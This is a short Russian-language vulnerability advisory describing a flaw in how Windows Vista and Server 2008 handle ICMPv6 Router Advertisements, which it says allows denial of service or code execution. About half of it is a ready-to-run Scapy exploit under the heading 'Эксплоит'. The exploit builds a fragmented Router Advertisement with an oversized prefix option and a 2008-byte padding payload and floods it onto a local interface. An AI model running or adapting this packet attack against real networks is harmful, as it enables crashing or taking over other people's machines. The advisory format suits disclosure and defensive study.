Программа:
Microsoft Windows Vista
Microsoft Windows Server 2008

Уязвимость позволяет удаленному злоумышленнику осуществить DoS атаку и
выполнить произвольный код на целевой системе. Уязвимость существует из-за
ошибки в проверке входных данных при использовании ICMPv6 Router. Атакующий
может осуществить манипуляцию с Scapy6 пакетами, обработка которых приведет к
отказу в обслуживании или выполнению произвольного кода.

Эксплоит:

v6_dst = "<IPv6 address>"

mac_dst = "<Mac address>"

pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() /
ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") /
Raw(load='A'*2008)

l=fragment6(pkt, 1500)

for p in l:
sendp(Ether(dst=mac_dst)/p, iface="eth0")

Оставить мнение